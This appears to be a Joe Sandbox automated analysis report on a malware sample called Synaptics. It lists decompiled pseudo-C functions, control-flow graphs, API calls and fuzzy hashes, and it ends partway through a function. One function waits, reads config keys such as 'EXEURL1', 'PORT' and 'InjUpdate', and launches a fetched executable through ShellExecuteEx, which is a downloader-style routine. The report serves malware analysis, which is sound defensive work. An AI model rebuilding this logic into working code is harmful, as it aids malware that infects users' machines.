                                                                                                                                                                                          0x0047b89e
                                                                                                                                                                                          0x0047b8a1
                                                                                                                                                                                          0x0047b8a4
                                                                                                                                                                                          0x0047b8a9
                                                                                                                                                                                          0x0047b8aa
                                                                                                                                                                                          0x0047b8af
                                                                                                                                                                                          0x0047b8b2
                                                                                                                                                                                          0x0047b8bc
                                                                                                                                                                                          0x0047b8cc
                                                                                                                                                                                          0x0047b8d8
                                                                                                                                                                                          0x0047b8df
                                                                                                                                                                                          0x0047b8e3
                                                                                                                                                                                          0x0047b8e7
                                                                                                                                                                                          0x0047b8ec
                                                                                                                                                                                          0x0047b8f4
                                                                                                                                                                                          0x0047b8fa
                                                                                                                                                                                          0x0047b8fd
                                                                                                                                                                                          0x0047b906
                                                                                                                                                                                          0x0047b907
                                                                                                                                                                                          0x0047b916
                                                                                                                                                                                          0x0047b91b
                                                                                                                                                                                          0x0047b91b
                                                                                                                                                                                          0x0047b925
                                                                                                                                                                                          0x0047b930
                                                                                                                                                                                          0x0047b93e
                                                                                                                                                                                          0x0047b944
                                                                                                                                                                                          0x0047b94c
                                                                                                                                                                                          0x0047b94f
                                                                                                                                                                                          0x0047b952
                                                                                                                                                                                          0x0047b964

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(WS2_32.DLL,00000000,0047B965), ref: 0047B8C7
                                                                                                                                                                                          • GetLastError.KERNEL32(WS2_32.DLL,00000000,0047B965), ref: 0047B8DA
                                                                                                                                                                                            • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(75CD0000,WSAStartup), ref: 0047B92B
                                                                                                                                                                                          • WSAStartup.WS2_32(?,?,75CD0000,WSAStartup,WS2_32.DLL,00000000,0047B965), ref: 0047B93E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Load$AddressErrorLastLibraryProcStartupString
                                                                                                                                                                                          • String ID: WS2_32.DLL$WS2_32.DLL$WSAStartup
                                                                                                                                                                                          • API String ID: 4221839523-1314211545
                                                                                                                                                                                          • Opcode ID: 6c5734486e13fb394c9afae55c5ff24803e84e5bca5e4d3926a118303e1b0425
                                                                                                                                                                                          • Instruction ID: c181d5f6f94ff0715040a16c2373e5647a9c70682208e90bacd88f35eee9369f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c5734486e13fb394c9afae55c5ff24803e84e5bca5e4d3926a118303e1b0425
                                                                                                                                                                                          • Instruction Fuzzy Hash: B3218EF1904204AFCB00EFA5C885B9EB7F8E758314F11C97BE618E3291D77859008B99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00434530 Relevance: 12.1, APIs: 8, Instructions: 63COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 651 434530-43457b 73CCAC50 GetTextMetricsA call 424e24 SelectObject GetTextMetricsA SelectObject 73CCB380 654 43459f-4345a8 651->654 655 43457d-434584 651->655 658 4345aa 654->658 659 4345ac-4345b8 GetSystemMetrics 654->659 656 434586-43458b 655->656 657 43458d 655->657 660 434592-43459d GetSystemMetrics 656->660 657->660 658->659 661 4345ba 659->661 662 4345bd-4345c2 659->662 663 4345c4-4345d7 call 43a75c 660->663 661->662 662->663
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E00434530(struct HDC__* __eax, void* __edx, void* __ebp, void* __eflags) {
				struct tagTEXTMETRICA _v112;
				void* __ebx;
				void* _t14;
				char* _t18;
				signed int _t19;
				signed int _t21;
				struct HDC__* _t27;
				signed int _t28;
				signed int _t30;
				signed int _t31;
				void* _t32;
				struct HDC__* _t38;
				struct tagTEXTMETRICA* _t40;

				_t40 =  &_v112;
				_t38 = __eax;
				_push(0);
				L00407638();
				_t27 = __eax;
				GetTextMetricsA(__eax, _t40);
				_t14 = SelectObject(_t27, E00424E24( *((intOrPtr*)(_t38 + 0x68)), _t27, _t32));
				GetTextMetricsA(_t27,  &(_v112.tmMaxCharWidth)); // executed
				SelectObject(_t27, _t14);
				_push(_t27);
				_push(0);
				L00407888();
				_t18 =  *0x49da40; // 0x49eb1c
				if( *_t18 == 0) {
					_t28 = _t40->tmHeight;
					_t19 = _v112.tmHeight;
					if(_t28 > _t19) {
						_t28 = _t19;
					}
					_t21 = GetSystemMetrics(6) << 2;
					if(_t28 < 0) {
						_t28 = _t28 + 3;
					}
					_t30 = _t21 + (_t28 >> 2);
				} else {
					if( *((char*)(_t38 + 0x1a5)) == 0) {
						_t31 = 6;
					} else {
						_t31 = 8;
					}
					_t30 = GetSystemMetrics(6) * _t31;
				}
				return E0043A75C(_t38, _v112 + _t30);
			}
















                                                                                                                                                                                          0x00434533
                                                                                                                                                                                          0x00434536
                                                                                                                                                                                          0x00434538
                                                                                                                                                                                          0x0043453a
                                                                                                                                                                                          0x0043453f
                                                                                                                                                                                          0x00434543
                                                                                                                                                                                          0x00434552
                                                                                                                                                                                          0x0043455f
                                                                                                                                                                                          0x00434566
                                                                                                                                                                                          0x0043456b
                                                                                                                                                                                          0x0043456c
                                                                                                                                                                                          0x0043456e
                                                                                                                                                                                          0x00434573
                                                                                                                                                                                          0x0043457b
                                                                                                                                                                                          0x0043459f
                                                                                                                                                                                          0x004345a2
                                                                                                                                                                                          0x004345a8
                                                                                                                                                                                          0x004345aa
                                                                                                                                                                                          0x004345aa
                                                                                                                                                                                          0x004345b3
                                                                                                                                                                                          0x004345b8
                                                                                                                                                                                          0x004345ba
                                                                                                                                                                                          0x004345ba
                                                                                                                                                                                          0x004345c2
                                                                                                                                                                                          0x0043457d
                                                                                                                                                                                          0x00434584
                                                                                                                                                                                          0x0043458d
                                                                                                                                                                                          0x00434586
                                                                                                                                                                                          0x00434586
                                                                                                                                                                                          0x00434586
                                                                                                                                                                                          0x0043459b
                                                                                                                                                                                          0x0043459b
                                                                                                                                                                                          0x004345d7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73CCAC50.USER32(00000000), ref: 0043453A
                                                                                                                                                                                          • GetTextMetricsA.GDI32(00000000), ref: 00434543
                                                                                                                                                                                            • Part of subcall function 00424E24: CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00434552
                                                                                                                                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 0043455F
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00434566
                                                                                                                                                                                          • 73CCB380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043456E
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00434594
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 004345AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3751190600-0
                                                                                                                                                                                          • Opcode ID: a7376c866b0e0f4c459314af59490de973a59b0eadc7fa28dbc4798c05a2bd8b
                                                                                                                                                                                          • Instruction ID: 5c0f3d8754ac9f53a552d955726f62212e9f387cfb0fc4aa99143b90913ccd9a
                                                                                                                                                                                          • Opcode Fuzzy Hash: a7376c866b0e0f4c459314af59490de973a59b0eadc7fa28dbc4798c05a2bd8b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2111A951F083003BE31066798CC2B6B65C8DB99358F84183AF646D73D2D57CBC41836B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00497CF0 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 323sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 666 497cf0-497cf3 667 497cf8-497cfd 666->667 667->667 668 497cff-497d89 Sleep call 4737b0 call 472d44 call 404d40 call 4737b0 call 472d44 call 404d40 call 474d34 667->668 683 49811b-49814a call 4049e4 call 4049c0 call 4049e4 668->683 684 497d8f 668->684 686 497d96-497d9a 684->686 687 497d9c-497d9d 686->687 688 497da4-497db2 call 404a58 686->688 690 497d9f-497da0 687->690 691 497db4-497dc2 call 404a58 687->691 699 497dd2-497dfc call 4967d4 call 474d50 688->699 694 497da2 690->694 695 497dc4-497dcd call 404a58 690->695 691->699 694->699 695->699 708 497f6d-497f97 call 4967d4 699->708 709 497e02-497f3d call 430158 call 4758e8 call 404a14 call 4758e8 call 404a14 call 4758e8 call 404a14 call 4758e8 call 404a14 call 4758e8 call 404a14 call 409628 call 4957b4 call 409628 699->709 708->686 715 497f9d-497fa1 708->715 798 497f3f-497f43 709->798 799 497f45-497f4f call 4967d4 709->799 715->683 717 497fa7 715->717 719 497fae-497fb2 717->719 721 497fbc-497fca call 404a58 719->721 722 497fb4-497fb5 719->722 733 497fea-498014 call 4967d4 call 474d50 721->733 724 497fcc-497fda call 404a58 722->724 725 497fb7-497fb8 722->725 724->733 728 497fba 725->728 729 497fdc-497fe5 call 404a58 725->729 728->733 729->733 744 4980fa-498115 733->744 745 49801a-498021 call 49a3e0 733->745 744->683 744->719 750 498026-49802d 745->750 752 49802f-498031 750->752 753 498033-49803a 750->753 755 498042-498065 call 472ef0 call 404dcc 752->755 756 49803c-49803e 753->756 757 498040 753->757 765 498067-49807e call 473490 755->765 766 4980b6-4980ce call 473490 755->766 756->755 757->755 776 49808e-4980a6 call 473490 765->776 777 498080-49808c call 45a800 765->777 774 4980dc-4980f8 766->774 775 4980d0-4980d7 call 45a800 766->775 774->683 775->774 776->774 786 4980a8-4980b4 call 45a800 776->786 777->774 786->774 800 497f54-497f6b call 403bec call 409bac 798->800 799->800 800->715
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E00497CF0(intOrPtr* __ebx, void* __edx, void* __edi, intOrPtr __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v21;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				void* _t84;
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				void* _t96;
				intOrPtr _t100;
				intOrPtr _t105;
				intOrPtr _t112;
				char _t113;
				intOrPtr _t119;
				intOrPtr _t121;
				char _t122;
				void* _t129;
				intOrPtr _t172;
				void* _t173;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t178;
				void* _t185;
				char _t192;
				void* _t193;
				void* _t210;
				intOrPtr _t224;
				intOrPtr _t227;
				intOrPtr _t231;
				intOrPtr _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t249;
				intOrPtr _t252;
				intOrPtr _t255;
				intOrPtr _t258;
				intOrPtr _t261;
				intOrPtr _t265;
				intOrPtr _t273;
				intOrPtr _t274;
				void* _t281;
				void* _t291;

				_t291 = __fp0;
				_t267 = __esi;
				_t266 = __edi;
				_t191 = __ebx;
				_t273 = _t274;
				_t193 = 0xa;
				do {
					_push(0);
					_push(0);
					_t193 = _t193 - 1;
				} while (_t193 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t273);
				_push(0x49814b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t274;
				Sleep(0xea60); // executed
				E004737B0( &_v28);
				_push(_v28);
				_push(0x498164);
				E00472D44(9, __ebx, _t193,  &_v32, __esi);
				_push(_v32);
				_push(".exe");
				E00404D40();
				E004737B0( &_v36);
				_push(_v36);
				_push(0x498164);
				E00472D44(7, __ebx, _t193,  &_v40, __esi);
				_push(_v40);
				_push(".ini");
				E00404D40();
				_v21 = 0;
				if(E00474D34(_t193) == 0) {
					L44:
					_pop(_t224);
					 *[fs:eax] = _t224;
					_push(E00498152);
					E004049E4( &_v84, 0xf);
					E004049C0( &_v20);
					return E004049E4( &_v12, 2);
				} else {
					_v16 = 1;
					while(1) {
						_t84 = _v16 - 1;
						if(_t84 == 0) {
							_t227 =  *0x49f174; // 0x22b3020
							E00404A58( &_v20, _t227);
						} else {
							_t185 = _t84 - 1;
							if(_t185 == 0) {
								_t232 =  *0x49f174; // 0x22b3020
								E00404A58( &_v20, _t232);
							} else {
								if(_t185 == 1) {
									_t233 =  *0x49f174; // 0x22b3020
									E00404A58( &_v20, _t233);
								}
							}
						}
						_push(_t273);
						_push(0x497f86);
						_push( *[fs:eax]);
						 *[fs:eax] = _t274;
						_t88 =  *0x49f13c; // 0x22b2354, executed
						E004967D4(_t88, _t191, 0x498190); // executed
						_t91 = E00474D50(_v20, _t191, _v8, _t267); // executed
						_t280 = _t91;
						if(_t91 != 0) {
							break;
						}
						_t92 =  *0x49f13c; // 0x22b2354
						E004967D4(_t92, _t191, 0x4981ec);
						_pop(_t231);
						 *[fs:eax] = _t231;
						_v16 = _v16 + 1;
						__eflags = _v16 - 4;
						if(_v16 != 4) {
							continue;
						} else {
							L18:
							if(_v21 == 0) {
								goto L44;
							}
							_v16 = 1;
							while(1) {
								_t96 = _v16 - 1;
								if(_t96 == 0) {
									_t234 =  *0x49f168; // 0x22b30f4
									E00404A58( &_v20, _t234);
								} else {
									_t129 = _t96 - 1;
									if(_t129 == 0) {
										_t238 =  *0x49f16c; // 0x22b314c
										E00404A58( &_v20, _t238);
									} else {
										if(_t129 == 1) {
											_t239 =  *0x49f170; // 0x22b3198
											E00404A58( &_v20, _t239);
										}
									}
								}
								_push(_t273);
								_push(0x498104);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t100 =  *0x49f13c; // 0x22b2354
								E004967D4(_t100, _t191, 0x49820c);
								if(E00474D50(_v20, _t191, _v12, _t267) != 0) {
									break;
								}
								_pop(_t237);
								_pop(_t210);
								 *[fs:eax] = _t237;
								_v16 = _v16 + 1;
								__eflags = _v16 - 4;
								if(_v16 != 4) {
									continue;
								} else {
									goto L44;
								}
							}
							_t105 =  *0x49f13c; // 0x22b2354
							E0049A3E0(_t105, _t191, 0, _t266, _t267, _t291);
							if( *0x49f148 == 0) {
								__eflags =  *0x49f149;
								if(__eflags == 0) {
									_t192 = 0;
									__eflags = 0;
								} else {
									_t192 = 1;
								}
							} else {
								_t192 = 1;
							}
							_push(_t273);
							_push(0x4980e6);
							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							E00472EF0( &_v84, _t192, _t210, 0);
							E00404DCC(_v84, 0x498230);
							if(0 == 0) {
								_t112 =  *0x49f1dc; // 0x70384
								_t113 = E00473490(_t112, _t192, "InjUpdate", _v12, __eflags, 0, 0);
								__eflags = _t113;
								if(_t113 != 0) {
									E0045A800();
								}
							} else {
								_t119 =  *0x49f1dc; // 0x70384
								if(E00473490(_t119, _t192, "InjUpdate", _v12, 0, 0, _t192) == 0) {
									_t121 =  *0x49f1dc; // 0x70384
									_t122 = E00473490(_t121, _t192, "InjUpdate", _v12, __eflags, 0, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										E0045A800();
									}
								} else {
									E0045A800();
								}
							}
							_pop(_t243);
							 *[fs:eax] = _t243;
							_pop(_t244);
							 *[fs:eax] = _t244;
							goto L44;
						}
					}
					_t191 = E00430158(_v8, 1);
					 *((intOrPtr*)( *_t191))( &_v48, 0);
					_t249 =  *0x49f1c8; // 0x22b07fc
					E004758E8(_v48, _t191,  &_v44, _t249);
					E00404A14(0x49f1c8, _v44);
					 *((intOrPtr*)( *_t191))( &_v56, 0);
					_t252 =  *0x49f15c; // 0x22b2fec
					E004758E8(_v56, _t191,  &_v52, _t252);
					E00404A14(0x49f15c, _v52);
					 *((intOrPtr*)( *_t191))( &_v64, 0);
					_t255 =  *0x49f168; // 0x22b30f4
					E004758E8(_v64, _t191,  &_v60, _t255);
					E00404A14(0x49f168, _v60);
					 *((intOrPtr*)( *_t191))( &_v72, 0);
					_t258 =  *0x49f16c; // 0x22b314c
					E004758E8(_v72, _t191,  &_v68, _t258);
					E00404A14(0x49f168, _v68);
					_t267 =  *_t191;
					 *((intOrPtr*)( *_t191))( &_v80, 0);
					_t261 =  *0x49f170; // 0x22b3198
					E004758E8(_v80, _t191,  &_v76, _t261);
					E00404A14(0x49f168, _v76);
					_t172 =  *0x49f15c; // 0x22b2fec
					_t173 = E00409628(_t172, _t273, _t280);
					_t174 =  *0x49f140; // 0x22b2a8c
					E004957B4(_t174, _t173);
					_t176 =  *0x49f1c8; // 0x22b07fc
					_t281 = E00409628(_t176, _t273, _t280) -  *0x49f14c; // 0x6a
					if(_t281 <= 0) {
						_t178 =  *0x49f13c; // 0x22b2354
						E004967D4(_t178, _t191, 0x4981ec);
					} else {
						_v21 = 1;
					}
					E00403BEC(_t191);
					E00409BAC(_v8);
					_pop(_t265);
					_pop(_t210);
					 *[fs:eax] = _t265;
					goto L18;
				}
			}


































































                                                                                                                                                                                          0x00497cf0
                                                                                                                                                                                          0x00497cf0
                                                                                                                                                                                          0x00497cf0
                                                                                                                                                                                          0x00497cf0
                                                                                                                                                                                          0x00497cf1
                                                                                                                                                                                          0x00497cf3
                                                                                                                                                                                          0x00497cf8
                                                                                                                                                                                          0x00497cf8
                                                                                                                                                                                          0x00497cfa
                                                                                                                                                                                          0x00497cfc
                                                                                                                                                                                          0x00497cfc
                                                                                                                                                                                          0x00497cff
                                                                                                                                                                                          0x00497d00
                                                                                                                                                                                          0x00497d01
                                                                                                                                                                                          0x00497d04
                                                                                                                                                                                          0x00497d05
                                                                                                                                                                                          0x00497d0a
                                                                                                                                                                                          0x00497d0d
                                                                                                                                                                                          0x00497d15
                                                                                                                                                                                          0x00497d1d
                                                                                                                                                                                          0x00497d22
                                                                                                                                                                                          0x00497d25
                                                                                                                                                                                          0x00497d32
                                                                                                                                                                                          0x00497d37
                                                                                                                                                                                          0x00497d3a
                                                                                                                                                                                          0x00497d47
                                                                                                                                                                                          0x00497d4f
                                                                                                                                                                                          0x00497d54
                                                                                                                                                                                          0x00497d57
                                                                                                                                                                                          0x00497d64
                                                                                                                                                                                          0x00497d69
                                                                                                                                                                                          0x00497d6c
                                                                                                                                                                                          0x00497d79
                                                                                                                                                                                          0x00497d7e
                                                                                                                                                                                          0x00497d89
                                                                                                                                                                                          0x0049811b
                                                                                                                                                                                          0x0049811d
                                                                                                                                                                                          0x00498120
                                                                                                                                                                                          0x00498123
                                                                                                                                                                                          0x00498130
                                                                                                                                                                                          0x00498138
                                                                                                                                                                                          0x0049814a
                                                                                                                                                                                          0x00497d8f
                                                                                                                                                                                          0x00497d8f
                                                                                                                                                                                          0x00497d96
                                                                                                                                                                                          0x00497d99
                                                                                                                                                                                          0x00497d9a
                                                                                                                                                                                          0x00497da7
                                                                                                                                                                                          0x00497dad
                                                                                                                                                                                          0x00497d9c
                                                                                                                                                                                          0x00497d9c
                                                                                                                                                                                          0x00497d9d
                                                                                                                                                                                          0x00497db7
                                                                                                                                                                                          0x00497dbd
                                                                                                                                                                                          0x00497d9f
                                                                                                                                                                                          0x00497da0
                                                                                                                                                                                          0x00497dc7
                                                                                                                                                                                          0x00497dcd
                                                                                                                                                                                          0x00497dcd
                                                                                                                                                                                          0x00497da0
                                                                                                                                                                                          0x00497d9d
                                                                                                                                                                                          0x00497dd4
                                                                                                                                                                                          0x00497dd5
                                                                                                                                                                                          0x00497dda
                                                                                                                                                                                          0x00497ddd
                                                                                                                                                                                          0x00497de5
                                                                                                                                                                                          0x00497dea
                                                                                                                                                                                          0x00497df5
                                                                                                                                                                                          0x00497dfa
                                                                                                                                                                                          0x00497dfc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00497f72
                                                                                                                                                                                          0x00497f77
                                                                                                                                                                                          0x00497f7e
                                                                                                                                                                                          0x00497f81
                                                                                                                                                                                          0x00497f90
                                                                                                                                                                                          0x00497f93
                                                                                                                                                                                          0x00497f97
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00497f9d
                                                                                                                                                                                          0x00497f9d
                                                                                                                                                                                          0x00497fa1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00497fa7
                                                                                                                                                                                          0x00497fae
                                                                                                                                                                                          0x00497fb1
                                                                                                                                                                                          0x00497fb2
                                                                                                                                                                                          0x00497fbf
                                                                                                                                                                                          0x00497fc5
                                                                                                                                                                                          0x00497fb4
                                                                                                                                                                                          0x00497fb4
                                                                                                                                                                                          0x00497fb5
                                                                                                                                                                                          0x00497fcf
                                                                                                                                                                                          0x00497fd5
                                                                                                                                                                                          0x00497fb7
                                                                                                                                                                                          0x00497fb8
                                                                                                                                                                                          0x00497fdf
                                                                                                                                                                                          0x00497fe5
                                                                                                                                                                                          0x00497fe5
                                                                                                                                                                                          0x00497fb8
                                                                                                                                                                                          0x00497fb5
                                                                                                                                                                                          0x00497fec
                                                                                                                                                                                          0x00497fed
                                                                                                                                                                                          0x00497ff2
                                                                                                                                                                                          0x00497ff5
                                                                                                                                                                                          0x00497ffd
                                                                                                                                                                                          0x00498002
                                                                                                                                                                                          0x00498014
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004980fc
                                                                                                                                                                                          0x004980fe
                                                                                                                                                                                          0x004980ff
                                                                                                                                                                                          0x0049810e
                                                                                                                                                                                          0x00498111
                                                                                                                                                                                          0x00498115
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00498115
                                                                                                                                                                                          0x0049801c
                                                                                                                                                                                          0x00498021
                                                                                                                                                                                          0x0049802d
                                                                                                                                                                                          0x00498033
                                                                                                                                                                                          0x0049803a
                                                                                                                                                                                          0x00498040
                                                                                                                                                                                          0x00498040
                                                                                                                                                                                          0x0049803c
                                                                                                                                                                                          0x0049803c
                                                                                                                                                                                          0x0049803c
                                                                                                                                                                                          0x0049802f
                                                                                                                                                                                          0x0049802f
                                                                                                                                                                                          0x0049802f
                                                                                                                                                                                          0x00498044
                                                                                                                                                                                          0x00498045
                                                                                                                                                                                          0x0049804a
                                                                                                                                                                                          0x0049804d
                                                                                                                                                                                          0x00498053
                                                                                                                                                                                          0x00498060
                                                                                                                                                                                          0x00498065
                                                                                                                                                                                          0x004980c2
                                                                                                                                                                                          0x004980c7
                                                                                                                                                                                          0x004980cc
                                                                                                                                                                                          0x004980ce
                                                                                                                                                                                          0x004980d7
                                                                                                                                                                                          0x004980d7
                                                                                                                                                                                          0x00498067
                                                                                                                                                                                          0x00498072
                                                                                                                                                                                          0x0049807e
                                                                                                                                                                                          0x0049809a
                                                                                                                                                                                          0x0049809f
                                                                                                                                                                                          0x004980a4
                                                                                                                                                                                          0x004980a6
                                                                                                                                                                                          0x004980af
                                                                                                                                                                                          0x004980af
                                                                                                                                                                                          0x00498080
                                                                                                                                                                                          0x00498087
                                                                                                                                                                                          0x00498087
                                                                                                                                                                                          0x0049807e
                                                                                                                                                                                          0x004980de
                                                                                                                                                                                          0x004980e1
                                                                                                                                                                                          0x004980f2
                                                                                                                                                                                          0x004980f5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004980f5
                                                                                                                                                                                          0x00497f97
                                                                                                                                                                                          0x00497e11
                                                                                                                                                                                          0x00497e27
                                                                                                                                                                                          0x00497e2f
                                                                                                                                                                                          0x00497e35
                                                                                                                                                                                          0x00497e42
                                                                                                                                                                                          0x00497e5b
                                                                                                                                                                                          0x00497e63
                                                                                                                                                                                          0x00497e69
                                                                                                                                                                                          0x00497e76
                                                                                                                                                                                          0x00497e8f
                                                                                                                                                                                          0x00497e97
                                                                                                                                                                                          0x00497e9d
                                                                                                                                                                                          0x00497eaa
                                                                                                                                                                                          0x00497ec3
                                                                                                                                                                                          0x00497ecb
                                                                                                                                                                                          0x00497ed1
                                                                                                                                                                                          0x00497ede
                                                                                                                                                                                          0x00497ef5
                                                                                                                                                                                          0x00497ef7
                                                                                                                                                                                          0x00497eff
                                                                                                                                                                                          0x00497f05
                                                                                                                                                                                          0x00497f12
                                                                                                                                                                                          0x00497f17
                                                                                                                                                                                          0x00497f1c
                                                                                                                                                                                          0x00497f23
                                                                                                                                                                                          0x00497f28
                                                                                                                                                                                          0x00497f2d
                                                                                                                                                                                          0x00497f37
                                                                                                                                                                                          0x00497f3d
                                                                                                                                                                                          0x00497f4a
                                                                                                                                                                                          0x00497f4f
                                                                                                                                                                                          0x00497f3f
                                                                                                                                                                                          0x00497f3f
                                                                                                                                                                                          0x00497f3f
                                                                                                                                                                                          0x00497f56
                                                                                                                                                                                          0x00497f5e
                                                                                                                                                                                          0x00497f65
                                                                                                                                                                                          0x00497f67
                                                                                                                                                                                          0x00497f68
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00497f68

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(0000EA60,00000000,0049814B,?,?,?,?,00000000,00000000), ref: 00497D15
                                                                                                                                                                                            • Part of subcall function 00473490: ShellExecuteEx.SHELL32(0000003C), ref: 00473512
                                                                                                                                                                                            • Part of subcall function 00473490: WaitForSingleObject.KERNEL32(00000000,00000032,00000000,00473564,?,00000000), ref: 00473536
                                                                                                                                                                                            • Part of subcall function 0045A800: PostQuitMessage.USER32(00000000), ref: 0045A80B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExecuteMessageObjectPostQuitShellSingleSleepWait
                                                                                                                                                                                          • String ID: .exe$.ini$EXEURL1$InjUpdate$PORT$VER
                                                                                                                                                                                          • API String ID: 1631069871-204213252
                                                                                                                                                                                          • Opcode ID: 55b519f68e2bb60c12d9a59471a109a20816d433321419680486cc4de4f5ceb1
                                                                                                                                                                                          • Instruction ID: 45283d241bb881e06991861ba9452227acefdf6b6ef9343d0a562746dac06cd8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 55b519f68e2bb60c12d9a59471a109a20816d433321419680486cc4de4f5ceb1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BC15130604108DFDF10EB69D852A9E7BB5EB96304F61847BE500E7391DB38AD0ACB5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004776D4 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                          			E004776D4(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				void* __ecx;
				void* _t95;
				char _t96;
				struct HINSTANCE__* _t106;
				struct HINSTANCE__* _t107;
				void* _t108;
				struct HINSTANCE__* _t109;
				void* _t112;
